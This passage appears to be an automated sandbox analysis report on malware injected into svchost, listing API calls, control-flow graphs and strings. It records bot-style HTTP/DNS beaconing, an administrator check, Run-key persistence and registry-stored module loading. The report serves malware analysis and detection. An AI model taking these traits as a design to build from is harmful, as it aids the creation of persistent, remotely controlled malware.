            • send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
            • recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC
            • recv.WS2_32(?,00000000,-00000002,00000000), ref: 0002171E
            • RtlAllocateHeap.NTDLL(00000008,00000004,?), ref: 0002173E
            • recv.WS2_32(?,00000000,00000400,00000000), ref: 00021757
            • RtlSizeHeap.NTDLL(00000000,00000000,?), ref: 00021772
            • RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,00000000), ref: 00021788
            • HeapFree.KERNEL32(00000000,00000000,?), ref: 000217AD
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 000217C4
            • shutdown.WS2_32(?,00000002), ref: 000217CE
            • closesocket.WS2_32(?), ref: 000217D6
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 000217E6
              • Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
              • Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
              • Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
              • Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
              • Part of subcall function 000211EC: DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
              • Part of subcall function 000211EC: socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
              • Part of subcall function 000211EC: WSACreateEvent.WS2_32 ref: 000212C1
              • Part of subcall function 000211EC: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
              • Part of subcall function 000211EC: sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
              • Part of subcall function 000211EC: WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
              • Part of subcall function 000211EC: recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E
            Strings
            • p://, xrefs: 0002157C
            • 200, xrefs: 000216D5
            • POST /%s HTTP/1.1Host: %sUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: %dConnection: close, xrefs: 00021663
            • GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0Connection: close, xrefs: 0002167B
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Heap$Allocate$Freerecv$ByteCharEventMultiWidesendsocketwsprintf$Buffer_CreateObjectQuestionSelectSingleSizeWaitWriteclosesocketconnectlstrcpylstrlenrecvfromsendtoshutdown
            • String ID: 200$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0Connection: close$POST /%s HTTP/1.1Host: %sUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: %dConnection: close$p://
            • API String ID: 1283243819-650216524
            • Opcode ID: 80c83bc40eb833485bd5528873149ba04c8dd4a30aeffe2e562c0e19deed8157
            • Instruction ID: ca7982863e95662c3e36eafd4c0f62391f95dd883b8f891a2fcf2e9d3333f067
            • Opcode Fuzzy Hash: 80c83bc40eb833485bd5528873149ba04c8dd4a30aeffe2e562c0e19deed8157
            • Instruction Fuzzy Hash: 8871A13090422AEADF319FA0ED42BEE7AB5BF24300F144164FA11B61B2D7769E11DB54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 131 20590-205ad RtlAllocateHeap 132 205b3-205ed wsprintfA 131->132 133 2076f-207a4 RtlExitUserThread RegCreateKeyExA 131->133 134 205f3-205f7 132->134 136 2083a-20843 RtlExitUserThread 133->136 137 207aa-207d3 RegEnumValueW 133->137 138 205f9-205fb 134->138 139 2065c-2068e lstrlen call 222b0 RtlAllocateHeap 134->139 140 20832-20835 RegCloseKey 137->140 141 207d5-207d7 137->141 138->139 142 205fd-2060a call 21f10 138->142 150 20694-206ad call 21041 lstrlen 139->150 151 2075f-2076a HeapFree 139->151 140->136 141->140 144 207d9-207ef VirtualAlloc 141->144 142->134 154 2060c-20610 142->154 147 207f1-20811 RegQueryValueExW 144->147 148 2082a-2082d 144->148 147->140 153 20813-20825 call 22199 VirtualFree 147->153 148->137 157 206b3-206b6 150->157 151->133 153->148 154->134 162 20612-2061d lstrlen 154->162 160 2074f-2075a HeapFree 157->160 161 206bc-206c5 call 21535 157->161 160->151 165 206ca-206cf 161->165 162->134 164 2061f-20633 RtlSizeHeap 162->164 164->134 166 20635-2064a RtlReAllocateHeap 164->166 165->157 167 206d1-206e3 RtlSizeHeap 165->167 166->134 168 2064c-2065a lstrcat 166->168 167->157 169 206e5-206ec 167->169 168->134 170 2073a-2074a HeapFree 169->170 171 206ee-206f1 169->171 170->157 171->170 172 206f3-20711 call 222b0 call 20fd0 171->172 172->170 177 20713-20738 call 22e82 HeapFree 172->177 177->160
            APIs
            • RtlAllocateHeap.NTDLL(00000000,00000064), ref: 000205A3
            • wsprintfA.USER32 ref: 000205E5
            • lstrlen.KERNEL32(00000000), ref: 00020616
            • RtlSizeHeap.NTDLL(00000000,?,00000000), ref: 0002062B
            • RtlReAllocateHeap.NTDLL(00000000,?,00000000,?), ref: 00020643
            • lstrcat.KERNEL32(?,?), ref: 00020655
            • lstrlen.KERNEL32(?), ref: 0002065F
            • RtlAllocateHeap.NTDLL(00000000,00000000,00020454), ref: 00020684
            • lstrlen.KERNEL32(?,?,?,?,00000000,00000000,00020454,00000020,?,?,?), ref: 000206A5
            • RtlSizeHeap.NTDLL(00000000,?,00000000), ref: 000206DC
            • HeapFree.KERNEL32(00000000,?), ref: 00020733
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 00020745
            • HeapFree.KERNEL32(00000000,?,?), ref: 0002075A
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 0002076A
            • RtlExitUserThread.NTDLL(00000000), ref: 00020771
            • RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002079D
            • RegEnumValueW.ADVAPI32(?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 000207C9
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000), ref: 000207E5
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000,?,00000020,00000000,00000000), ref: 0002080A
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000), ref: 00020825
            • RegCloseKey.ADVAPI32(?,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?), ref: 00020835
            • RtlExitUserThread.NTDLL(00000000,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002083C
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Heap$Free$Allocatelstrlen$ExitSizeThreadUserValueVirtual$AllocCloseCreateEnumQuerylstrcatwsprintf
            • String ID: $id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu$software\microsoft
            • API String ID: 3265116144-1820778675
            • Opcode ID: b30dfb967b1a2b7197b6dd8df2ac0f3d39355cffbeae54138017a88ea3bd435b
            • Instruction ID: f09b47422ae7a81f46a3ae03e59903e78e389f5283b2eb324dc41a7052b188fa
            • Opcode Fuzzy Hash: b30dfb967b1a2b7197b6dd8df2ac0f3d39355cffbeae54138017a88ea3bd435b
            • Instruction Fuzzy Hash: 6B714271900225FEEF61ABE0ED92FEE7A79FB14700F204164B600B50A3DB759A51DB64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 180 21897-218b3 RtlAllocateHeap 181 218b9-218c9 ConvertStringSidToSidA 180->181 182 219cf-219d0 180->182 183 218eb-21919 lstrcpyW 181->183 184 218cb-218e9 CheckTokenMembership LocalFree 181->184 186 21957-2196a GetTickCount 183->186 184->183 185 2191b-21954 wsprintfW 184->185 185->186 187 219ca 186->187 188 2196c-21978 186->188 187->182 188->187 189 2197a-21986 188->189 189->187 190 21988-21994 189->190 190->187 191 21996-219a2 190->191 191->187 192 219a4-219b0 191->192 192->187 193 219b2-219be 192->193 193->187 194 219c0 193->194 194->187
            APIs
            • RtlAllocateHeap.NTDLL(00000000,00000040), ref: 000218A7
            • ConvertStringSidToSidA.ADVAPI32(S-1-5-32-544,?), ref: 000218C2
            • CheckTokenMembership.ADVAPI32(00000000,?,000230F8,00000000,00000040), ref: 000218D5
            • LocalFree.KERNEL32(?,00000000,?,000230F8,00000000,00000040), ref: 000218DD
            • lstrcpyW.KERNEL32(Load,00000000), ref: 00021914
            • wsprintfW.USER32 ref: 0002194F
            • GetTickCount.KERNEL32(Load,00000000,00000040), ref: 00021957
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: AllocateCheckConvertCountFreeHeapLocalMembershipStringTickTokenlstrcpywsprintf
            • String ID: %allusersprofile%$%lu$%userprofile%$Load$S-1-5-32-544$bat$cmd$com$com$exe$exe$pif$scr$software\microsoft\windows nt\currentversion\windows$software\microsoft\windows\currentversion\Policies\Explorer\Run
            • API String ID: 2048046775-1591313489
            • Opcode ID: 6edd1678e4c6b75253428dcb76e1de57de34ac8a7491860ea0b4972191eea149
            • Instruction ID: 945564738f0592ae5b826c65c8337ac2077e6e0c7e2e4cd104fbb78bcab7d531
            • Opcode Fuzzy Hash: 6edd1678e4c6b75253428dcb76e1de57de34ac8a7491860ea0b4972191eea149
            • Instruction Fuzzy Hash: FB219070040325EAF7759B88FC2E6E43BE1A321308B304526D9946A173D7FC47ABCB84
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 230 20846-2086c VirtualAlloc 231 20872-208b6 ExpandEnvironmentStringsW SetCurrentDirectoryW lstrcpy RegOpenKeyExA 230->231 232 20967-20970 RtlExitUserThread 230->232 233 20943-20962 GetSystemDirectoryW SetCurrentDirectoryW VirtualFree 231->233 234 208bc-208f7 RegEnumValueW 231->234 233->232 235 2093b-2093e RegCloseKey 234->235 236 208f9-208fb 234->236 235->233 237 20936-20939 236->237 238 208fd-20901 236->238 237->234 238->237 239 20903-20911 LoadLibraryW 238->239 239->237 240 20913-20916 239->240 241 20919-2091e 240->241 242 20923-20932 GetProcAddress 241->242 243 20920-20921 241->243 242->237 244 20934 242->244 243->241 244->237
            APIs
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00020862
            • ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 0002087F
            • SetCurrentDirectoryW.KERNEL32(?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020887
            • lstrcpy.KERNEL32(?,software\microsoft), ref: 00020896
            • RegOpenKeyExA.ADVAPI32(?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 000208AF
            • RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,00020019,?,?,%allusersprofile%,?,00008000), ref: 000208ED
            • LoadLibraryW.KERNEL32(?), ref: 00020907
            • GetProcAddress.KERNEL32(?,?,?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,?,0000001F,00000000,00000000), ref: 0002092B
            • RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,?,00000030,?,00000000,00020019,?,?,%allusersprofile%,?), ref: 0002093E
            • GetSystemDirectoryW.KERNEL32(?,00008000), ref: 0002094B
            • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020953
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00020019,?,?,%allusersprofile%,?,00008000,00000000,00008000,00001000,00000004), ref: 00020962
            • RtlExitUserThread.NTDLL(00000000,00000000,00008000,00001000,00000004), ref: 00020969
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Directory$CurrentVirtual$AddressAllocCloseEnumEnvironmentExitExpandFreeLibraryLoadOpenProcStringsSystemThreadUserValuelstrcpy
            • String ID: %allusersprofile%$0$software\microsoft
            • API String ID: 1099496884-2452022100
            • Opcode ID: 74fc7717356dcc51d53d622bfe86d268f7e3befb8305d93e95ccad0985603c93
            • Instruction ID: 9e865700be21dc6c3e78602b7619125e8dbcb6cd6b58808818b57b83d987b6ea
            • Opcode Fuzzy Hash: 74fc7717356dcc51d53d622bfe86d268f7e3befb8305d93e95ccad0985603c93
            • Instruction Fuzzy Hash: A631097190032ABAEF61ABD0ED42BEEBBBDAF04300F104071B615B60A3DB759A54DF50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 245 211ec-21210 RtlAllocateHeap 246 213c2-213c6 245->246 247 21216-2122d MultiByteToWideChar 245->247 248 213b2-213bd HeapFree 247->248 249 21233-21248 RtlAllocateHeap 247->249 248->246 249->248 250 2124e-21264 MultiByteToWideChar 249->250 251 213a2-213ad HeapFree 250->251 252 2126a-2128b DnsWriteQuestionToBuffer_W 250->252 251->248 252->251 253 21291-212bb socket 252->253 253->251 254 212c1-212d8 WSACreateEvent WSAEventSelect 253->254 255 21392-2139d CloseHandle closesocket 254->255 256 212de-212f7 sendto 254->256 255->251 256->255 257 212fd-2130c WaitForSingleObject 256->257 257->255 258 21312-21338 recvfrom 257->258 258->255 259 2133a-2133d 258->259 259->255 260 2133f-2136b DnsExtractRecordsFromMessage_W 259->260 260->255 261 2136d 260->261 262 21370-21375 261->262 263 21380-21385 262->263 264 21377-2137a 262->264 265 21388-2138d DnsRecordListFree 263->265 264->265 266 2137c-2137e 264->266 265->255 266->262
            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
            • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
            • DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
            • socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
            • WSACreateEvent.WS2_32 ref: 000212C1
            • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
            • sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
            • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
            • recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E
            • DnsExtractRecordsFromMessage_W.DNSAPI(000215D6,?,?), ref: 00021364
            • DnsRecordListFree.DNSAPI(?,00000001), ref: 0002138D
            • CloseHandle.KERNEL32(00000000), ref: 00021395
            • closesocket.WS2_32(?), ref: 0002139D
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 000213AD
            • HeapFree.KERNEL32(00000000,000215D6,00000000), ref: 000213BD
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Heap$Free$AllocateByteCharEventMultiWide$Buffer_CloseCreateExtractFromHandleListMessage_ObjectQuestionRecordRecordsSelectSingleWaitWriteclosesocketrecvfromsendtosocket
            • String ID:
            • API String ID: 3117261188-0
            • Opcode ID: d289c797924f79de744e79cda91552966516e6b96953fabc4a4284b90282829d
            • Instruction ID: d64e9c556fcfb5a0ccc3b7b5cdc9ad452adf9344b05153ecfe3c5b1745fb3474
            • Opcode Fuzzy Hash: d289c797924f79de744e79cda91552966516e6b96953fabc4a4284b90282829d
            • Instruction Fuzzy Hash: 82517130900219BAEF61EB90ED42FDDB6B6BF14710F248124F650BA0F1D7B59A54DB24
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 267 1e4e6d-1e4e91 GetStartupInfoW call 1e4b0d 270 1e4e9b-1e4eae 267->270 271 1e4e93-1e4e96 267->271 273 1e4ee6-1e4eec 270->273 274 1e4eb0 270->274 272 1e50aa-1e50ac 271->272 276 1e4ef2-1e4ef7 273->276 277 1e5000 273->277 275 1e4eb3-1e4ee4 274->275 275->273 275->275 276->277 279 1e4efd-1e4f11 276->279 278 1e5002-1e5012 277->278 280 1e501f-1e5025 278->280 281 1e5014-1e5017 278->281 282 1e4f15-1e4f1b 279->282 283 1e4f13 279->283 285 1e502c-1e5033 280->285 286 1e5027-1e502a 280->286 281->280 284 1e5019-1e501d 281->284 287 1e4f1d 282->287 288 1e4f88-1e4f8c 282->288 283->282 290 1e5090-1e5094 284->290 291 1e5036-1e5042 GetStdHandle 285->291 286->291 289 1e4f22-1e4f2f call 1e4b0d 287->289 288->277 292 1e4f8e-1e4f96 288->292 303 1e4f82 289->303 304 1e4f31-1e4f42 289->304 290->278 294 1e509a-1e50a6 SetHandleCount 290->294 295 1e5086-1e508a 291->295 296 1e5044-1e5046 291->296 297 1e4f98-1e4f9b 292->297 298 1e4ff4-1e4ffe 292->298 300 1e50a8-1e50a9 294->300 295->290 296->295 301 1e5048-1e5051 GetFileType 296->301 297->298 302 1e4f9d-1e4fa5 297->302 298->277 298->292 300->272 301->295 305 1e5053-1e505d 301->305 302->298 306 1e4fa7-1e4faa 302->306 303->288 307 1e4f44 304->307 308 1e4f75-1e4f7e 304->308 309 1e505f-1e5063 305->309 310 1e5065-1e5068 305->310 311 1e4fac-1e4fb5 GetFileType 306->311 312 1e4fb7-1e4feb InitializeCriticalSectionAndSpinCount 306->312 315 1e4f47-1e4f73 307->315 308->289 316 1e4f80 308->316 317 1e506e-1e507f InitializeCriticalSectionAndSpinCount 309->317 310->317 318 1e506a 310->318 311->298 311->312 313 1e50ad-1e50b0 312->313 314 1e4ff1 312->314 313->300 314->298 315->308 315->315 316->288 317->313 319 1e5081-1e5084 317->319 318->317 319->290
            APIs
            • GetStartupInfoW.KERNEL32(?,00000000), ref: 001E4E7A
            • __calloc_crt.LIBCMT ref: 001E4E86
              • Part of subcall function 001E4B0D: Sleep.KERNEL32(00000000), ref: 001E4B35
            • __calloc_crt.LIBCMT ref: 001E4F26
            • GetFileType.KERNEL32 ref: 001E4FAD
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: __calloc_crt$FileInfoSleepStartupType
            • String ID:
            • API String ID: 591920814-0
            • Opcode ID: b5c6b95ae49224e67f321412c33b9233d8216211b2e7548a861568e0c1d23acc
            • Instruction ID: 6d4a0aed3eaa9570ec793c0cc808fc959ad108616259e0b42a6c6e6cfa29958d
            • Opcode Fuzzy Hash: b5c6b95ae49224e67f321412c33b9233d8216211b2e7548a861568e0c1d23acc
            • Instruction Fuzzy Hash: E161F671900F818FD720CF6AC888B2D7BE5AF19734F294668E566DB2E2D730D845CB81
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 320 20776-207a4 RegCreateKeyExA 321 2083a-20843 RtlExitUserThread 320->321 322 207aa-207d3 RegEnumValueW 320->322 323 20832-20835 RegCloseKey 322->323 324 207d5-207d7 322->324 323->321 324->323 325 207d9-207ef VirtualAlloc 324->325 326 207f1-20811 RegQueryValueExW 325->326 327 2082a-2082d 325->327 326->323 328 20813-20825 call 22199 VirtualFree 326->328 327->322 328->327
            APIs
            • RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002079D
            • RegEnumValueW.ADVAPI32(?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 000207C9
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000), ref: 000207E5
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000,?,00000020,00000000,00000000), ref: 0002080A
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,00000000,00000000,?,?,00000000,?,00001000,00000004,?,00000000), ref: 00020825
            • RegCloseKey.ADVAPI32(?,?,?,?,00000020,00000000,00000000,00000000,?,software\microsoft,00000000,00000000,00000000,00020019,00000000,?), ref: 00020835
            • RtlExitUserThread.NTDLL(00000000,software\microsoft,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 0002083C
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: ValueVirtual$AllocCloseCreateEnumExitFreeQueryThreadUser
            • String ID: $id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu$software\microsoft
            • API String ID: 370110947-1820778675
            • Opcode ID: c74316f4ad1b2afb49dda309f0bf995519bf959f2d1df23f5c639d5e484c898a
            • Instruction ID: 2fb70a33149fc07271206229af12b4087d01f7760a434be6e2cb247919877b31
            • Opcode Fuzzy Hash: c74316f4ad1b2afb49dda309f0bf995519bf959f2d1df23f5c639d5e484c898a
            • Instruction Fuzzy Hash: B411FE71950218BEFB159BD0ED42FEEB6BDEB18700F104165FA00B5092EBB0AA14DB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 345 1e1070-1e1077 346 1e1079-1e108c OpenMutexW 345->346 347 1e10b5-1e10bb 345->347 348 1e10be-1e10c1 346->348 349 1e108e-1e10af CreateMutexW CreateThread 346->349 349->347
            APIs
            • OpenMutexW.KERNEL32(001F0001,00000000,TLS,?,001E32D1,?,?,?,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E1084
            • CreateMutexW.KERNELBASE(00000000,00000000,TLS,?,001E32D1,?,?,?,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E1095
            • CreateThread.KERNELBASE(00000000,00000000,001E10D0,typedef struct,00000000,00000001), ref: 001E10AF
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: CreateMutex$OpenThread
            • String ID: TLS$typedef struct
            • API String ID: 3612403252-68249997
            • Opcode ID: 23e2531ac7a6ea6acbe585ed0c49941e39ffbd257bf12102053035fc8a16ba29
            • Instruction ID: 25f9a1cbee7b0ba13bb0b092d20ae64d5dac984ffd1e4b75138d38f9462a9260
            • Opcode Fuzzy Hash: 23e2531ac7a6ea6acbe585ed0c49941e39ffbd257bf12102053035fc8a16ba29
            • Instruction Fuzzy Hash: 43E048753807C97BE720DB926C4AFAE375C9B50B14F404015BD0DDA5C1D7F4B580C521
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 350 213c9-213e8 DnsQuery_A 351 213ea 350->351 352 2140f-21413 350->352 353 213ed-213f2 351->353 354 213f4-213f7 353->354 355 213fd-21402 353->355 356 21405-2140a DnsRecordListFree 354->356 357 213f9-213fb 354->357 355->356 356->352 357->353
            APIs
            • DnsQuery_A.DNSAPI(?,00000001,00000000,00000000,?,00000000), ref: 000213E1
            • DnsRecordListFree.DNSAPI(?,00000001), ref: 0002140A
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: FreeListQuery_Record
            • String ID:
            • API String ID: 3988062426-0
            • Opcode ID: e64dc5f6cf2fc8e564f1c36a5e35bb8c1e36c6d0ea91e30a76e609308c0fee21
            • Instruction ID: 917bba8bad55b8de9bf1036380321a6f7db63df5757736f3a015b48b7591bb7a
            • Opcode Fuzzy Hash: e64dc5f6cf2fc8e564f1c36a5e35bb8c1e36c6d0ea91e30a76e609308c0fee21
            • Instruction Fuzzy Hash: 81F03A70A10218EFEB14DF54D886FED77B6EB14304F1041A5F5049B2A1E3B1EF81DA50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 358 22199-221b2 359 22297-2229e 358->359 360 221b8-221db call 222b0 call 22174 358->360 360->359 365 221e1-221f7 VirtualAlloc 360->365 365->359 366 221fd-2220e call 22052 365->366 369 22210-22238 call 222b0 call 220f2 call 21f7d 366->369 370 22288-22292 VirtualFree 366->370 369->370 377 2223a-2224e call 21fd8 369->377 370->359 377->370 380 22250-2226a call 1e335b 377->380 381 2226c-22271 380->381 381->370 382 22273 381->382 383 22279-2227d 382->383 383->359 384 2227f-22281 383->384 384->383 385 22283-22286 384->385 385->359
            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000010,?,00020454,00000020,00000010,?), ref: 000221ED
            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00022292
              • Part of subcall function 000220F2: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000000), ref: 00022129
              • Part of subcall function 000220F2: VirtualFree.KERNEL32(00000010,00000000,00008000,00000000,?,00001000,00000040,00000000), ref: 00022167
              • Part of subcall function 00021FD8: LoadLibraryA.KERNEL32(00000010,?,?,00000000), ref: 00022002
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Virtual$AllocFree$LibraryLoad
            • String ID:
            • API String ID: 1149141302-0
            • Opcode ID: 0af6b46702dc183195f19cb2ee8ae2ed94e6b90bf3743bbb5b7d8b6fb53bedba
            • Instruction ID: cb17b7bbbe5fa87d1700283ba1511cf1a02a65c0a4515a74beb7e1cf3b5194b8
            • Opcode Fuzzy Hash: 0af6b46702dc183195f19cb2ee8ae2ed94e6b90bf3743bbb5b7d8b6fb53bedba
            • Instruction Fuzzy Hash: B3318070600329FBDF61DFD4ED82FD9BBB8AF14300F5045A1BA00AA092D771DA54DB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,00000000), ref: 00022129
            • VirtualFree.KERNEL32(00000010,00000000,00008000,00000000,?,00001000,00000040,00000000), ref: 00022167
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: cd798245b2e76542509d64b98d3e12ff8ec292439d66e5525a18435d546579e6
            • Instruction ID: 32e71e1972f89b0f3150727d6f8afb84db78b1aef7f0e9d6d9e16e5f30cf3838
            • Opcode Fuzzy Hash: cd798245b2e76542509d64b98d3e12ff8ec292439d66e5525a18435d546579e6
            • Instruction Fuzzy Hash: 97110575940208ABDF84DF94DC81B8EB7B5BF08314F158090ED186B386D770FA50CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32(00000010,?,?,00000000), ref: 00022002
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 25d991ee594b92c996d61e6126097692e3d5b1e43fd5b8b39e8d1785e9ab938a
